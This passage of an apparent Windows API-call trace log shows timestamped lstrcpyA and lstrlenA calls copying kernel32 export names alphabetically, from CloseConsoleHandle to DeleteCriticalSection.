lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.910] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.910] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.910] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.910] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.910] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.910] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.910] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.910] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.910] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.910] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.910] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.911] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.911] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.911] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.911] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.911] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.911] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.911] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.911] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.911] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.911] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.911] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.911] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.911] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.911] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.911] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.911] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.911] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.911] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.911] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.911] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.912] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.912] lstrlenA (lpString="COPYFILEA") returned 9 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.912] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.912] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.912] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.912] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.912] lstrlenA (lpString="COPYFILEW") returned 9 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.912] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.912] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.912] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.912] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.912] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.912] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.912] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.912] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.912] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.912] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.912] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.912] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.912] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.913] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.913] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.913] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.913] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.913] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.913] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.913] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.913] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.913] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.913] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.913] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.913] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.913] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.913] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.913] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.913] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.913] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.913] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.913] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.914] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.914] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.914] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.914] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.914] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.914] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.914] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.914] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.914] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.914] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.914] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.914] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.914] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.914] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.914] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.914] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.914] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.914] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.914] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.914] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.915] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.915] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.915] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.915] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.915] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.915] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.915] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.915] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.915] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.915] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.915] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.915] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.915] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.915] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.915] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.915] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.915] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.915] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.915] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.915] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.916] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.916] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.916] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.916] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.916] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.916] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.916] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.916] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.916] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.916] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.916] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.916] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.916] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.916] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.916] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.916] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.916] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.916] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.916] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.917] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.936] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.936] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.936] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.936] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.936] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.936] lstrlenA (lpString="DELETEATOM") returned 10 [0078.936] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.936] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.936] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.936] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.936] lstrcpyA (in: 